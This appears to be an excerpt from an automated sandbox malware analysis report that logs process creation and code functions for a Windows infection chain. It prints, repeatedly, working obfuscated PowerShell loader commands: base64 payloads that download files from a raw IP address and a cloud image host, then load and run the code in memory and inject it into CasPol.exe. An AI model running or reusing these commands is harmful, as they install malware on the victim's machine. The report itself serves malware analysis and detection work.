INVokE-EXpreSsIOn($(INvoke-exPressIOn('[SYStEM.tEXT.eNCoDINg]'+[CHAr]0X3A+[ChAr]0x3a+'UtF8.GeTSTRing([SYsteM.CONveRT]'+[CHaR]0X3A+[cHar]58+'FrOmbaSe64sTrIng('+[cHar]34+'JG0yICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZGQtdHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlUmRlRmlOaVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdqaE1tTXZxR0tHLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbGhTSyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENRQkFlWlQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSUNFY1JkZUlVeCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHB6eHh6cG1JKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlp4ek5LWW9HSndQIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3F6R2pUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbTI6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNDIuOTMuNjUuMTYxLzY4MC93ZW5lZWRraXNzaW5nd2VsbG9uZ2lybGZyaWVuZHNoZWJlYXV0aWZ1bGdpcmwudElGIiwiJGVOVjpBUFBEQVRBXHdlbmVlZGtpc3Npbmd3ZWxsb25naXJsZnJpZW5kc2hlYmVhdXRpZi52YlMiLDAsMCk7U3RBUnQtU0xFRXAoMyk7aWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcd2VuZWVka2lzc2luZ3dlbGxvbmdpcmxmcmllbmRzaGViZWF1dGlmLnZiUyI='+[ChaR]34+'))')))"Jump to behavior
                  Suspicious powershell command line found
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwerSHEll.EXe -EX BypasS -NOp -w 1 -c DEViCecredEnTiAldEPloyMEnT ; INVokE-EXpreSsIOn($(INvoke-exPressIOn('[SYStEM.tEXT.eNCoDINg]'+[CHAr]0X3A+[ChAr]0x3a+'UtF8.GeTSTRing([SYsteM.CONveRT]'+[CHaR]0X3A+[cHar]58+'FrOmbaSe64sTrIng('+[cHar]34+'JG0yICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZGQtdHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlUmRlRmlOaVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdqaE1tTXZxR0tHLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbGhTSyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENRQkFlWlQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSUNFY1JkZUlVeCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHB6eHh6cG1JKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlp4ek5LWW9HSndQIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3F6R2pUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbTI6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNDIuOTMuNjUuMTYxLzY4MC93ZW5lZWRraXNzaW5nd2VsbG9uZ2lybGZyaWVuZHNoZWJlYXV0aWZ1bGdpcmwudElGIiwiJGVOVjpBUFBEQVRBXHdlbmVlZGtpc3Npbmd3ZWxsb25naXJsZnJpZW5kc2hlYmVhdXRpZi52YlMiLDAsMCk7U3RBUnQtU0xFRXAoMyk7aWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcd2VuZWVka2lzc2luZ3dlbGxvbmdpcmxmcmllbmRzaGViZWF1dGlmLnZiUyI='+[ChaR]34+'))')))"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $biscato = 'JHNvcnJlbmFyID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGRlc2VyZGFyID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskZGVzYXZlc3NvID0gJGRlc2VyZGFyLkRvd25sb2FkRGF0YSgkc29ycmVuYXIpOyR0b21iZWlybyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRkZXNhdmVzc28pOyRjcmV0aW5pemFyID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRnbGFuZHVsaWZvcm1lID0gJzw8QkFTRTY0X0VORD4+JzskZ3Jvc2EgPSAkdG9tYmVpcm8uSW5kZXhPZigkY3JldGluaXphcik7JHRyaWdsb3R0aXNtbyA9ICR0b21iZWlyby5JbmRleE9mKCRnbGFuZHVsaWZvcm1lKTskZ3Jvc2EgLWdlIDAgLWFuZCAkdHJpZ2xvdHRpc21vIC1ndCAkZ3Jvc2E7JGdyb3NhICs9ICRjcmV0aW5pemFyLkxlbmd0aDskZGVzYWJhZmFyID0gJHRyaWdsb3R0aXNtbyAtICRncm9zYTskc29mZnJpdmVsbWVudGUgPSAkdG9tYmVpcm8uU3Vic3RyaW5nKCRncm9zYSwgJGRlc2FiYWZhcik7JGNvbnRyYWNhbWJpYXIgPSAtam9pbiAoJHNvZmZyaXZlbG1lbnRlLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRzb2Zmcml2ZWxtZW50ZS5MZW5ndGgpXTskY2F0YXJhY3RhID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkY29udHJhY2FtYmlhcik7JGJhbWJ1bGEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRjYXRhcmFjdGEpOyR0cmluY29sZWpvID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JHRyaW5jb2xlam8uSW52b2tlKCRudWxsLCBAKCd0eHQuUkVSVlJTLzA4Ni8xNjEuNTYuMzkuMjQxLy86cHR0aCcsICckYW5pbWFyJywgJyRhbmltYXInLCAnJGFuaW1hcicsICdDYXNQb2wnLCAnJGFuaW1hcicsICckYW5pbWFyJywnJGFuaW1hcicsJyRhbmltYXInLCckYW5pbWFyJywnJGFuaW1hcicsJyRhbmltYXInLCcxJywnJGFuaW1hcicpKTs=';$desalinhadamente = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($biscato));Invoke-Expression $desalinhadamente
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwerSHEll.EXe -EX BypasS -NOp -w 1 -c DEViCecredEnTiAldEPloyMEnT ; INVokE-EXpreSsIOn($(INvoke-exPressIOn('[SYStEM.tEXT.eNCoDINg]'+[CHAr]0X3A+[ChAr]0x3a+'UtF8.GeTSTRing([SYsteM.CONveRT]'+[CHaR]0X3A+[cHar]58+'FrOmbaSe64sTrIng('+[cHar]34+'JG0yICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZGQtdHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlUmRlRmlOaVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdqaE1tTXZxR0tHLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbGhTSyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENRQkFlWlQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSUNFY1JkZUlVeCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHB6eHh6cG1JKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlp4ek5LWW9HSndQIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3F6R2pUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbTI6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNDIuOTMuNjUuMTYxLzY4MC93ZW5lZWRraXNzaW5nd2VsbG9uZ2lybGZyaWVuZHNoZWJlYXV0aWZ1bGdpcmwudElGIiwiJGVOVjpBUFBEQVRBXHdlbmVlZGtpc3Npbmd3ZWxsb25naXJsZnJpZW5kc2hlYmVhdXRpZi52YlMiLDAsMCk7U3RBUnQtU0xFRXAoMyk7aWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcd2VuZWVka2lzc2luZ3dlbGxvbmdpcmxmcmllbmRzaGViZWF1dGlmLnZiUyI='+[ChaR]34+'))')))"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $biscato = 'JHNvcnJlbmFyID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGRlc2VyZGFyID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskZGVzYXZlc3NvID0gJGRlc2VyZGFyLkRvd25sb2FkRGF0YSgkc29ycmVuYXIpOyR0b21iZWlybyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRkZXNhdmVzc28pOyRjcmV0aW5pemFyID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRnbGFuZHVsaWZvcm1lID0gJzw8QkFTRTY0X0VORD4+JzskZ3Jvc2EgPSAkdG9tYmVpcm8uSW5kZXhPZigkY3JldGluaXphcik7JHRyaWdsb3R0aXNtbyA9ICR0b21iZWlyby5JbmRleE9mKCRnbGFuZHVsaWZvcm1lKTskZ3Jvc2EgLWdlIDAgLWFuZCAkdHJpZ2xvdHRpc21vIC1ndCAkZ3Jvc2E7JGdyb3NhICs9ICRjcmV0aW5pemFyLkxlbmd0aDskZGVzYWJhZmFyID0gJHRyaWdsb3R0aXNtbyAtICRncm9zYTskc29mZnJpdmVsbWVudGUgPSAkdG9tYmVpcm8uU3Vic3RyaW5nKCRncm9zYSwgJGRlc2FiYWZhcik7JGNvbnRyYWNhbWJpYXIgPSAtam9pbiAoJHNvZmZyaXZlbG1lbnRlLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRzb2Zmcml2ZWxtZW50ZS5MZW5ndGgpXTskY2F0YXJhY3RhID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkY29udHJhY2FtYmlhcik7JGJhbWJ1bGEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRjYXRhcmFjdGEpOyR0cmluY29sZWpvID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JHRyaW5jb2xlam8uSW52b2tlKCRudWxsLCBAKCd0eHQuUkVSVlJTLzA4Ni8xNjEuNTYuMzkuMjQxLy86cHR0aCcsICckYW5pbWFyJywgJyRhbmltYXInLCAnJGFuaW1hcicsICdDYXNQb2wnLCAnJGFuaW1hcicsICckYW5pbWFyJywnJGFuaW1hcicsJyRhbmltYXInLCckYW5pbWFyJywnJGFuaW1hcicsJyRhbmltYXInLCcxJywnJGFuaW1hcicpKTs=';$desalinhadamente = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($biscato));Invoke-Expression $desalinhadamente
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwerSHEll.EXe -EX BypasS -NOp -w 1 -c DEViCecredEnTiAldEPloyMEnT ; INVokE-EXpreSsIOn($(INvoke-exPressIOn('[SYStEM.tEXT.eNCoDINg]'+[CHAr]0X3A+[ChAr]0x3a+'UtF8.GeTSTRing([SYsteM.CONveRT]'+[CHaR]0X3A+[cHar]58+'FrOmbaSe64sTrIng('+[cHar]34+'JG0yICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZGQtdHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlUmRlRmlOaVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdqaE1tTXZxR0tHLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbGhTSyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENRQkFlWlQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSUNFY1JkZUlVeCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHB6eHh6cG1JKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlp4ek5LWW9HSndQIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3F6R2pUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbTI6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNDIuOTMuNjUuMTYxLzY4MC93ZW5lZWRraXNzaW5nd2VsbG9uZ2lybGZyaWVuZHNoZWJlYXV0aWZ1bGdpcmwudElGIiwiJGVOVjpBUFBEQVRBXHdlbmVlZGtpc3Npbmd3ZWxsb25naXJsZnJpZW5kc2hlYmVhdXRpZi52YlMiLDAsMCk7U3RBUnQtU0xFRXAoMyk7aWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcd2VuZWVka2lzc2luZ3dlbGxvbmdpcmxmcmllbmRzaGViZWF1dGlmLnZiUyI='+[ChaR]34+'))')))"Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $biscato = 'JHNvcnJlbmFyID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGRlc2VyZGFyID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskZGVzYXZlc3NvID0gJGRlc2VyZGFyLkRvd25sb2FkRGF0YSgkc29ycmVuYXIpOyR0b21iZWlybyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRkZXNhdmVzc28pOyRjcmV0aW5pemFyID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRnbGFuZHVsaWZvcm1lID0gJzw8QkFTRTY0X0VORD4+JzskZ3Jvc2EgPSAkdG9tYmVpcm8uSW5kZXhPZigkY3JldGluaXphcik7JHRyaWdsb3R0aXNtbyA9ICR0b21iZWlyby5JbmRleE9mKCRnbGFuZHVsaWZvcm1lKTskZ3Jvc2EgLWdlIDAgLWFuZCAkdHJpZ2xvdHRpc21vIC1ndCAkZ3Jvc2E7JGdyb3NhICs9ICRjcmV0aW5pemFyLkxlbmd0aDskZGVzYWJhZmFyID0gJHRyaWdsb3R0aXNtbyAtICRncm9zYTskc29mZnJpdmVsbWVudGUgPSAkdG9tYmVpcm8uU3Vic3RyaW5nKCRncm9zYSwgJGRlc2FiYWZhcik7JGNvbnRyYWNhbWJpYXIgPSAtam9pbiAoJHNvZmZyaXZlbG1lbnRlLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRzb2Zmcml2ZWxtZW50ZS5MZW5ndGgpXTskY2F0YXJhY3RhID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkY29udHJhY2FtYmlhcik7JGJhbWJ1bGEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRjYXRhcmFjdGEpOyR0cmluY29sZWpvID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JHRyaW5jb2xlam8uSW52b2tlKCRudWxsLCBAKCd0eHQuUkVSVlJTLzA4Ni8xNjEuNTYuMzkuMjQxLy86cHR0aCcsICckYW5pbWFyJywgJyRhbmltYXInLCAnJGFuaW1hcicsICdDYXNQb2wnLCAnJGFuaW1hcicsICckYW5pbWFyJywnJGFuaW1hcicsJyRhbmltYXInLCckYW5pbWFyJywnJGFuaW1hcicsJyRhbmltYXInLCcxJywnJGFuaW1hcicpKTs=';$desalinhadamente = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($biscato));Invoke-Expression $desalinhadamenteJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwerSHEll.EXe -EX BypasS -NOp -w 1 -c DEViCecredEnTiAldEPloyMEnT ; INVokE-EXpreSsIOn($(INvoke-exPressIOn('[SYStEM.tEXT.eNCoDINg]'+[CHAr]0X3A+[ChAr]0x3a+'UtF8.GeTSTRing([SYsteM.CONveRT]'+[CHaR]0X3A+[cHar]58+'FrOmbaSe64sTrIng('+[cHar]34+'JG0yICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZGQtdHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlUmRlRmlOaVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdqaE1tTXZxR0tHLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbGhTSyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENRQkFlWlQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSUNFY1JkZUlVeCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHB6eHh6cG1JKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlp4ek5LWW9HSndQIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3F6R2pUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbTI6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNDIuOTMuNjUuMTYxLzY4MC93ZW5lZWRraXNzaW5nd2VsbG9uZ2lybGZyaWVuZHNoZWJlYXV0aWZ1bGdpcmwudElGIiwiJGVOVjpBUFBEQVRBXHdlbmVlZGtpc3Npbmd3ZWxsb25naXJsZnJpZW5kc2hlYmVhdXRpZi52YlMiLDAsMCk7U3RBUnQtU0xFRXAoMyk7aWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcd2VuZWVka2lzc2luZ3dlbGxvbmdpcmxmcmllbmRzaGViZWF1dGlmLnZiUyI='+[ChaR]34+'))')))"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $biscato = 'JHNvcnJlbmFyID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGRlc2VyZGFyID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskZGVzYXZlc3NvID0gJGRlc2VyZGFyLkRvd25sb2FkRGF0YSgkc29ycmVuYXIpOyR0b21iZWlybyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRkZXNhdmVzc28pOyRjcmV0aW5pemFyID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRnbGFuZHVsaWZvcm1lID0gJzw8QkFTRTY0X0VORD4+JzskZ3Jvc2EgPSAkdG9tYmVpcm8uSW5kZXhPZigkY3JldGluaXphcik7JHRyaWdsb3R0aXNtbyA9ICR0b21iZWlyby5JbmRleE9mKCRnbGFuZHVsaWZvcm1lKTskZ3Jvc2EgLWdlIDAgLWFuZCAkdHJpZ2xvdHRpc21vIC1ndCAkZ3Jvc2E7JGdyb3NhICs9ICRjcmV0aW5pemFyLkxlbmd0aDskZGVzYWJhZmFyID0gJHRyaWdsb3R0aXNtbyAtICRncm9zYTskc29mZnJpdmVsbWVudGUgPSAkdG9tYmVpcm8uU3Vic3RyaW5nKCRncm9zYSwgJGRlc2FiYWZhcik7JGNvbnRyYWNhbWJpYXIgPSAtam9pbiAoJHNvZmZyaXZlbG1lbnRlLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRzb2Zmcml2ZWxtZW50ZS5MZW5ndGgpXTskY2F0YXJhY3RhID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkY29udHJhY2FtYmlhcik7JGJhbWJ1bGEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRjYXRhcmFjdGEpOyR0cmluY29sZWpvID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JHRyaW5jb2xlam8uSW52b2tlKCRudWxsLCBAKCd0eHQuUkVSVlJTLzA4Ni8xNjEuNTYuMzkuMjQxLy86cHR0aCcsICckYW5pbWFyJywgJyRhbmltYXInLCAnJGFuaW1hcicsICdDYXNQb2wnLCAnJGFuaW1hcicsICckYW5pbWFyJywnJGFuaW1hcicsJyRhbmltYXInLCckYW5pbWFyJywnJGFuaW1hcicsJyRhbmltYXInLCcxJywnJGFuaW1hcicpKTs=';$desalinhadamente = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($biscato));Invoke-Expression $desalinhadamente
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sietgs52\sietgs52.cmdline"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tc3erle0\tc3erle0.cmdline"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sietgs52\sietgs52.cmdline"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tc3erle0\tc3erle0.cmdline"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 29_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,29_2_004044A4
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_000007FE899C022D push eax; iretd 7_2_000007FE899C0241
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_000007FE899C00BD pushad ; iretd 7_2_000007FE899C00C1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 29_2_0044693D push ecx; ret 29_2_0044694D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 29_2_0044DB70 push eax; ret 29_2_0044DB84
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 29_2_0044DB70 push eax; ret 29_2_0044DBAC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 29_2_00451D54 push eax; ret 29_2_00451D61
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 30_2_0044B090 push eax; ret 30_2_0044B0A4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 30_2_0044B090 push eax; ret 30_2_0044B0CC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 30_2_00451D34 push eax; ret 30_2_00451D41
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 30_2_00444E71 push ecx; ret 30_2_00444E81
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_00414060 push eax; ret 31_2_00414074
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_00414060 push eax; ret 31_2_0041409C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_00414039 push ecx; ret 31_2_00414049
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_004164EB push 0000006Ah; retf 31_2_004165C4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_00416553 push 0000006Ah; retf 31_2_004165C4
